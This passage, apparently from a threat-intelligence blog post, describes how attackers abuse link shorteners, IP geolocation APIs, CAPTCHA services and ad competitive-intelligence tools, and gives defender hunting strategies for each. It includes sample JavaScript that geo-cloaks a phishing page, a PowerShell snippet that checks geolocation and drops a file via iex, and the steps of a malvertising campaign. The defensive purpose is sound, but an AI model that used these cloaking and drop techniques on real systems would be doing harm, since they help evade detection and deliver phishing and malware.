data-block-key="5gqqt">Figure 6: bit.ly click-through analytics dashboard</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Defending Against Attacks Leveraging Link Shorteners</span></h3> <p><span style="vertical-align: baseline;">Given the fairly ubiquitous nature of link shorteners, unilaterally blocking them from use within an environment is generally inadvisable as this decision would likely impact both productivity and user experience. Instead, defenders should consider implementing some form of automated analysis around them that has the ability to detect behavioral conditions, such as:</span></p> <ul> <li role="presentation"><span style="vertical-align: baseline;">If the shortened URL goes to a second/nested shortened URL on different infrastructure</span></li> <li role="presentation"><span style="vertical-align: baseline;">If the same shortened URL has appeared multiple times in a short timespan in telemetry data associated with different hosts within an environment</span></li> <li role="presentation"><span style="vertical-align: baseline;">If the URL goes directly to an executable or archive file on a cloud-hosting service or a file with a “non-standard” file type (e.g., .REV file)</span></li> </ul> <p><span style="vertical-align: baseline;">Additionally, it’s possible to identify suspicious behavioral patterns in network telemetry that may indicate link shortener abuse. As part of this exercise, we reviewed the network telemetry associated with two simulated attack chains leveraging a bit.ly URL as an Initial Infection Vector (IIV) and identified some viable elements of the traffic around which to potentially build detections or hunting strategies:</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Attack Configuration</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Network Requests</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Hunting Strategy</span></strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">bit.ly -&gt; Credential Harvesting Page (afakeloginpage[.]xyz)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">00:00:00</span><span style="vertical-align: baseline;"> - init Client Hello (TLS), bit.ly</span></p> <p><span style="vertical-align: baseline;">00:00:00</span><span style="vertical-align: baseline;"> - init DNS resolution request, afakeloginpage[.]xyz</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">In bit.ly’s particular case, there is minimal delay (milliseconds) between the time a host initiates a connection via Client Hello and the time that the host initiates the DNS resolution for its final destination. If any DNS resolution telemetry is evident for a suspicious domain within such close proximity to bit.ly traffic (particularly for domains with non-standard TLDs like “.site,” “.xyz,” “.top,” or “.lol”), consider investigating the activity further.</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">bit.ly -&gt; zip file hosted on Google Drive</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">00:00:00 - init Client Hello (TLS), bit.ly</span></p> <p><span style="vertical-align: baseline;">00:00:00 - DNS resolution request, drive.google[.]com</span></p> <p><span style="vertical-align: baseline;">00:00:00 - Client Hello, drive.google[.]com</span></p> <p><span style="vertical-align: baseline;">00:00:00 - DNS resolution request, drive[.]usercontent[.]google[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Similar to the aforementioned example, there is minimal delay (milliseconds) between the time a host initiates a connection via Client Hello for bit.ly and when it attempts to connect to and/or make domain resolutions for the domains drive.google.com and drive.usercontent.google.com. Any occurrence of these three domains being accessed from a given host in quick succession likely means that a remote file was accessed via bit.ly link and additional investigation into the associated host may be warranted. This detection approach can also be generalized by looking for the co-occurence of network requests for a bit.ly URL followed by a domain categorized by a firewall or proxy device as online storage or file sharing.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 1: Simulated bit.ly attack telemetry analysis</span></div></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">The World in a String: Weaponized IP Geolocation Utilities</span></h2> <p><span style="vertical-align: baseline;">IP geolocation utilities can be used legitimately by advertisers and marketers to gauge the geo-dispersed impact of advertising reach and the effectiveness of marketing funnels (albeit with varying levels of granularity and data availability). However, Mandiant has observed IP geolocation utilities used by attackers (</span><a href="https://attack.mitre.org/techniques/T1614/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">MITRE ATT&amp;CK Technique T1614</span></a><span style="vertical-align: baseline;">). Some real-world attack patterns that Mandiant has observed leveraging IP geolocation utilities include:</span></p> <ul> <li role="presentation"><span style="vertical-align: baseline;">Malware payloads connecting to geolocation services for infection tracking purposes upon successful host compromise, </span><a href="https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-connecting-to-bleepingcomputer-during-encryption/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">such as with the Kraken Ransomware</span></a><span style="vertical-align: baseline;">. This allows attackers a window into how fast and how far their campaign is spreading.</span></li> <li role="presentation"><span style="vertical-align: baseline;">Malware conditionally performing malicious actions based on IP geolocation data. This functionality allows attackers a level of control around their window of vulnerability and ensures they do not engage in “friendly fire” if their motivations are geo-political in nature, such as indiscriminate nation-state targeting by hacktivists. An example of this technique can be seen in the case of the TURKEYDROP variant of the Adwind malware, which attempts to surgically target systems located in Turkey. </span></li> <li role="presentation"><span style="vertical-align: baseline;">Threat actors placing access restrictions on phishing lure pages and second-stage malware downloads based on IP ranges (</span><a href="https://cloud.google.com/blog/topics/threat-intelligence/caffeine-phishing-service-platform/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">a feature of the Caffeine PhaaS platform</span></a><span style="vertical-align: baseline;">). This allows attackers a limited defensive mechanism against having their campaign infrastructure identified and mitigated too rapidly.</span></li> </ul> <p><span style="vertical-align: baseline;">Though elegantly simple, these capabilities are vital for attackers to gain insights into their active campaigns and to prolong their campaigns’ duration and effectiveness.</span></p> <h3><span style="vertical-align: baseline;">How2DoUn2Others</span></h3> <p><span style="vertical-align: baseline;">Though there are many examples of IP-based geolocation utilities that have been used by attackers, for illustrative purposes the example shown here will use ip2location.io.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig7.max-1000x1000.png" alt="Ip2Location.io subscription page"> </a> <figcaption class="article-image__caption "><p data-block-key="ktvmy">Figure 7: Ip2Location.io subscription page</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">ip2location.io has a fairly robust feature set (Figure 7) with a free version offering a dedicated API key with respectable limits and upper tier subscriptions offering progressively granular insights into the IP address query results that would be useful to attackers. Using ip2location.io, it is possible to determine things like: </span></p> <ul> <li role="presentation"><span style="vertical-align: baseline;">If the connecting entity’s IP address falls within an IP netblock owned by a specific company</span></li> <li role="presentation"><span style="vertical-align: baseline;">Currency associated with the locale of the connecting entity</span></li> <li role="presentation"><span style="vertical-align: baseline;">If the connecting entity is using a VPN</span></li> <li role="presentation"><span style="vertical-align: baseline;">If the connecting entity is using Tor</span></li> </ul> <p><span style="vertical-align: baseline;">From an attacker perspective, a primary function of leveraging this type of tooling is integrating it with programmatic actions to both optimize targeting and evade detection. In the following example code snippet, a simple webpage can be configured with Javascript to perform a lookup using the ip2location API and redirect users to different pages based on their locale or connection type. If the user is connecting from a country outside the United States, it will show them an otherwise innocuous page. If the user is connecting from inside the U.S. and is not using a VPN or Tor (in contrast to some analysis sandbox environments), then they will be directed to a malicious webpage. If they are using a VPN or Tor, they will be shown an error page.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>&lt;script type="module"&gt; let raw_response = await fetch('https://api.ip2location.io/?key=&lt;key&gt;&amp;format=json'); let response_text = await raw_response.text(); var parsed_json = JSON.parse(response_text); if(parsed["country_code"]=="US") { if(parsed["proxy"]["is_tor"] == true || parsed["proxy"]["is_vpn"] == true) document.location = 'error.html'; else document.location = 'evilpage.html'; } else document.location = 'nothingburger.html'; &lt;/script&gt;</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Though the previously shown example is configured to simply route connecting users to different pages based on their connection attributes, it also has the potential to be surprisingly effective at thwarting automated analysis tools. This sort of technique is particularly applicable to regional phishing attacks that target specific geo-dispersed companies or campaigns that target users in certain geographic regions.</span></p> <h3><span style="vertical-align: baseline;">Defending Against Attacks Leveraging IP Geolocation Utilities</span></h3> <p><span style="vertical-align: baseline;">While IP geolocation utilities commonly appear on legitimate websites, it is less likely that such a methodology would be used programmatically by non-browser processes on endpoints, such as individual workstations. This is good news for defenders, as detection and hunting efforts can primarily focus on correlating observed URL-based telemetry data with anomalous events in endpoint telemetry.</span></p> <p><span style="vertical-align: baseline;">For example, a simulated attack script can be seen in the following PowerShell code snippet using the ip2location.io service:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>$Response = Invoke-WebRequest -UseBasicParsing -URI https://api.ip2location.io/?key=&lt;key&gt; if ($Response.Content.IndexOf('"country_code":"US"') -ne "0"){ $EvilScript = 'echo "&lt;raw bytes of evil file to drop on disk&gt;" &gt;&gt; C:\TEMP\out.tmp' iex $EvilScript }</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">This command leverages PowerShell to programmatically connect to ip2location.io, determine if the host is connecting via a U.S.-based IP address, and, if so, drop the file “C:\TEMP\out.tmp” to disk. </span></p> <p><span style="vertical-align: baseline;">In network-based telemetry, the User-Agent for the PowerShell Invoke-Webrequest function is </span><a href="https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.4#-useragent" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">clearly identified</span></a><span style="vertical-align: baseline;">. Thus, a behavioral network detection for the PowerShell User Agent connecting to ip2location.io could be created to identify this activity. While this is a fairly narrow detection, the concept can be widened by defenders based on the size of their environment and their level of noise tolerance.</span></p> <h3><span style="vertical-align: baseline;">Doing the CAPTCHA-cha Slide: Evading Detection with Bot Classification Tools</span></h3> <p><span style="vertical-align: baseline;">CAPTCHA, which is short for Completely Automated Public Turing test to tell Computers and Humans Apart, was developed to prevent bots and automated activity from accessing and interacting with web forms and hosted resources. Implementations of CAPTCHA technology, such as Google’s reCAPTCHA or CloudFlare’s Turnstile, are used as a security measure to filter out unwanted bot activity while permitting human users to access websites and interact with forms and other elements of a webpage (e.g., HTML buttons). Traditionally, CAPTCHA security challenges have required users to solve a visual puzzle or perform a brief interactive task. More recent implementations perform passive score-based detection to identify bot activity based on behavioral characteristics.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig8.max-1000x1000.png" alt="Evolution of reCAPTCHA"> </a> <figcaption class="article-image__caption "><p data-block-key="4lnyd">Figure 8: Evolution of reCAPTCHA</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">While intended to address the issue of malicious activity, CAPTCHA technology has been co-opted for use by threat actors to evade detection and scanning of their malicious infrastructure and payloads by security tools (</span><a href="https://attack.mitre.org/techniques/T1633/001/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">MITRE ATT&amp;CK T1633.001</span></a><span style="vertical-align: baseline;">). For example, threat actors have been observed using free CAPTCHA services to prevent dynamic access and detonation actions that are typically performed by email security technologies to determine if a URL is malicious. This provides threat actors with the ability to allow human users to access a phishing page while screening out programmatic activity and the usage of data transfer tools like cURL (Figure 9).</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig9.max-1000x1000.png" alt="CAPTCHA victim flow"> </a> <figcaption class="article-image__caption "><p data-block-key="4fx9h">Figure 9: CAPTCHA victim flow</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Mandiant has tracked UNC5296 abusing Google Sites services as early as January 2024 to host CAPTCHA challenges that redirect users to download a ZIP archive. The ZIP archive contains a malicious LNK file masquerading as a PDF file from a financial institution that, once executed, leads to the deployment of either AZORULT or DANCEFLOOR. Mandiant has also identified </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/fin11-email-campaigns-precursor-for-ransomware-data-theft?e=48754805"><span style="text-decoration: underline; vertical-align: baseline;">FIN11</span></a><span style="vertical-align: baseline;"> using CAPTCHA challenges as part of a phishing campaign in June 2020 to deliver the FRIENDSPEAK downloader and MIXLABEL backdoor.</span></p> <h3><span style="vertical-align: baseline;">Defending Against Attacks Using Bot Classification Tools</span></h3> <p><span style="vertical-align: baseline;">CAPTCHA tools have an extensive, legitimate use on the Internet, which makes it challenging to detect when they’re being used for malicious purposes. CAPTCHA widgets are easily implemented within a website using a few lines of HTML to reference the corresponding JavaScript resource and a unique site key that’s associated with the user who registered the CAPTCHA challenge.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>&lt;html&gt; &lt;head&gt; &lt;title&gt;reCAPTCHA Test&lt;/title&gt; &lt;script src="https://www.google.com/recaptcha/api.js"&gt;&lt;/script&gt; &lt;script&gt; function passRedirect() { window.location.href = "https://www.youtube.com/watch?v=dQw4w9WgXcQ"; } &lt;/script&gt; &lt;div class="g-recaptcha" data-sitekey="&lt;removed&gt;" data-callback="passRedirect"&gt;&lt;/div&gt; &lt;/html&gt;</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">When the CAPTCHA challenge is implemented within an intermediate webpage, defenders can use the network requests for the CAPTCHA JavaScript API files as potential detection or enrichment opportunities.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">CAPTCHA Technology</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Network Requests</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Detection Strategy</span></strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">reCAPTCHA v2</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">00:00:00 - screening website accessed</span></p> <p><span style="vertical-align: baseline;">00:00:00 - www.google.com/recaptcha/api.js</span></p> <p><span style="vertical-align: baseline;">00:00:00 - www.gstatic.com/recaptcha/releases/vjbW55<br/>W42X033PfTdVf6Ft4q/recaptcha__en.js</span></p> <p><span style="vertical-align: baseline;">00:00:20 - www.google.com/recaptcha/api2/anchor?ar=1&amp;k=&lt;unique reCAPTCHA sitekey&gt;&amp;co=&lt;snip&gt;</span></p> <p><span style="vertical-align: baseline;">00:00:52 - redirection to website after passing CAPTCHA</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Look for suspicious proxy or firewall events occurring within 1 second of requests for www.google.com and www.gstatic.com, further refine based on the URI(s) if TLS decryption is available. Potentially include a suspicious proxy or firewall event for the redirection domain occurring within 1 minute of the previous sequence.</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CloudFlare Turnstile</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">00:00:00 - screening website accessed</span></p> <p><span style="vertical-align: baseline;">00:00:00 - challenges.cloudflare.com/turnstile/v0/api.js</span></p> <p><span style="vertical-align: baseline;">00:00:20 - redirection to website after passing CAPTCHA</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Look for suspicious proxy or firewall events occurring within 1 second of a request for challenges.cloudflare.com</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 2: Simulated CAPTCHA telemetry analysis</span></div></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">A Real Jack-Ads: Stealing What Works for Loopholes and Profit</span></h2> <p><span style="vertical-align: baseline;">In practice, marketers have many variables to consider when running an ad campaign. There is the content of the ad itself (e.g., text, video, images), the demographics of the intended audience, the geolocation of where the ad will be displayed, and the time of day it will be displayed, among many other factors. Starting a new ad campaign often requires experimentation and refinement on the part of the marketers to find an ad “formula” that best aligns with the product or service they are trying to advertise. </span></p> <p><span style="vertical-align: baseline;">To get a head start on the process of digital advertising refinement, marketers can use competitive intelligence tools to see what ads their competitors are running. Depending on the tool, marketers can see keywords tied to their competition’s ads, the websites and applications the ad appeared on, media types associated with the ads (e.g., video, text, images), the landing pages users were shown after they clicked the ad, and many other notable advertising insights. One of the more well-known and robust tools for this includes </span><a href="https://www.adbeat.com/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">AdBeat</span></a><span style="vertical-align: baseline;">. </span><a href="https://adstransparency.google.com/?region=CA" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google</span></a><span style="vertical-align: baseline;"> and </span><a href="https://www.facebook.com/ads/library/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Meta</span></a><span style="vertical-align: baseline;"> also have repositories. These Search Engine Marketing (SEM) tools can provide insights to threat actors looking to set up malicious or dubious advertising campaigns (</span><a href="https://attack.mitre.org/techniques/T1583/008/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">MITRE ATT&amp;CK Technique T1583.008</span></a><span style="vertical-align: baseline;">), including </span><a href="https://www.blackhatworld.com/seo/curacao-licensed-casino-advertising-with-their-own-domain-how-is-it-possible.1416621/post-16178266" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">advertisement geolocation</span></a><span style="vertical-align: baseline;"> and </span><a href="https://www.blackhatworld.com/seo/google-ads-gambling.1469082" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">effective keyword usage to circumvent Google Ads policies</span></a><span style="vertical-align: baseline;"> (Figure 10 and Figure 11).</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig10.max-1000x1000.png" alt="Geo-location competitive intel tool functionality mentioned on the blackhatworld.com forum"> </a> <figcaption class="article-image__caption "><p data-block-key="seg8j">Figure 10: Geolocation competitive intel tool functionality <a href="https://www.blackhatworld.com/seo/curacao-licensed-casino-advertising-with-their-own-domain-how-is-it-possible.1416621/post-16178266">mentioned on the blackhatworld.com forum</a></p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig11.max-1000x1000.png" alt="Recommendation for competitive intel tools to assist with keyword refinement mentioned on the blackhatworld.com forum"> </a> <figcaption class="article-image__caption "><p data-block-key="seg8j">Figure 11: Recommendation for competitive intel tools to assist with keyword refinement <a href="https://www.blackhatworld.com/seo/google-ads-gambling.1469082/post-16031082">mentioned on the blackhatworld.com forum</a></p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Crafting a Malvertising Victim Flow</span></h3> <p><span style="vertical-align: baseline;">To illustrate how competitive intelligence tools can be used by threat actors, we’ll explore the steps involved in planning, staging, and executing a malvertising campaign based on a real-life campaign that was investigated and actioned by Google Ads threat researchers. An example of a process threat actors can use to create malvertising campaigns is outlined in Figure 12.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig12.max-1000x1000.png" alt="Steps for setting up a malvertising campaign"> </a> <figcaption class="article-image__caption "><p data-block-key="seg8j">Figure 12: Steps for setting up a malvertising campaign</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Copying an Ad That Works <span style="vertical-align: baseline;">—</span> What Can Marketers See?</span></h3> <p><span style="vertical-align: baseline;">Much like their legitimate marketer counterparts, a typical starting point for attackers looking to launch a malvertising campaign is deciding which advertising keywords will attract the highest number of potential victims. Using keyword research features available in some Search Engine Marketing tools, a threat actor would be able to see how many users have historically interacted with ads related to specific keywords.</span></p> <p><span style="vertical-align: baseline;">For example, based on the data available within one competitive intelligence tool, in June 2024, an estimated 220,000 clicks originated from relevant ads associated with the keywords “advanced ip scanner” from multiple domains, including two — “ktgotit[.]com” and “advanced-ip-scanner[.]com” — that did not have any associated traffic in June 2024 but have historically been associated with the same keywords. Then, in correlating this data with historical ads featuring the domain ktgotit[.]com, the following ad could be identified as a viable one for mimicking by an attacker*:</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--medium h-c-grid__col h-c-grid__col--4 h-c-grid__col--offset-4 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/weaponize-digital-analytics-tools-fig13a.png" alt="Ad snippet, ktgotit[.]com"> </a> <figcaption class="article-image__caption "><p data-block-key="seg8j">Figure 13: Ad snippet, ktgotit[.]com</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%;"> <tbody> <tr> <td style="width: 98.1839%;"><span style="vertical-align: baseline;">*Using one of the competitive intelligence tools, SEM data associated with ktgotit[.]com indicates that the ad in Figure 13 may have generated an estimated 3,000 visits at a cost of just under $7,000.</span></td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Typically, malicious advertisers employ several techniques in crafting their malicious ad content, including:</span></p> <ul> <li role="presentation"><span style="vertical-align: baseline;">Consciously avoiding any mention of legitimate brands in their advertising text to avoid keyword flags</span></li> <li role="presentation"><span style="vertical-align: baseline;">Creating a landing page with a domain name unrelated to the original product, service, or brand they are seeking to emulate</span></li> <li role="presentation"><span style="vertical-align: baseline;">Creating a “fake site” with a fictitious e-commerce brand</span></li> <li role="presentation"><span style="vertical-align: baseline;">Using cloaked pages, a technique that uses a combination of connection origination checks, device profiling, and page redirects between an initial landing page URL and its final destination in an attempt to conceal malicious activity</span></li> </ul> <p><span style="vertical-align: baseline;">Additional insights like whether other malvertising campaigns are making it past moderation filters with misspellings of an official or legitimate website or using entirely unrelated web domains can also be helpful to attackers. Attackers can use this information to craft a convincing landing page that is shown to the user immediately after the ad is clicked to entice the user to move further into the victim flow.</span></p> <h3><span style="vertical-align: baseline;">The Clone Wars</span></h3> <p><span style="vertical-align: baseline;">Armed with the strategic insights gathered from competitive intelligence tools, a would-be attacker could confirm that mirroring the victim flow previously used by the ktgotit[.]com malvertising campaign would be an effective strategy to expose their malicious ads to a high number of potential victims for a reasonable price. Thus, the attacker may then decide to:</span></p> <ul> <li role="presentation"><span style="vertical-align: baseline;">Purchase and configure hosting domains for their landing pages and payloads (the details of which are platform-dependent)</span></li> <li role="presentation"><span style="vertical-align: baseline;">Generate and host a landing page (competitive intelligence tools may integrate this in the service)</span></li> <li role="presentation"><span style="vertical-align: baseline;">Configure their cloaking page redirects and/or hosted distribution payloads (if applicable)</span></li> <li role="presentation"><span style="vertical-align: baseline;">Purchase advertising space for their keywords and deploy their ad (also platform-dependent)</span></li> </ul> <p><span style="vertical-align: baseline;">At that point all that would be left for the attacker to do is to watch their analytics traffic and wait for victims!</span></p> <h3><span style="vertical-align: baseline;">Epilogue: We Done ktgotit</span></h3> <p><span style="vertical-align: baseline;">In the case of the ad directing users to ktgotit[.]com (Figure 13), </span><a href="https://urlscan.io/result/a41ada0e-e952-44d6-bdbe-0d7516a1d3e3/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">the malware author used an e-commerce “decoy” page</span></a><span style="vertical-align: baseline;"> with cloaking to circumvent traditional automated analysis techniques and to conceal the final destination URL serving the malicious content. However, even cloaking mechanisms can be defeated (much to the lament of the Romulans), and in the case of ktgotit[.]com, Google threat researchers were able to determine the final destination URL for the page was</span><span style="vertical-align: baseline;"> hxxps://aadvanced-ip-scanner[.]com.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img 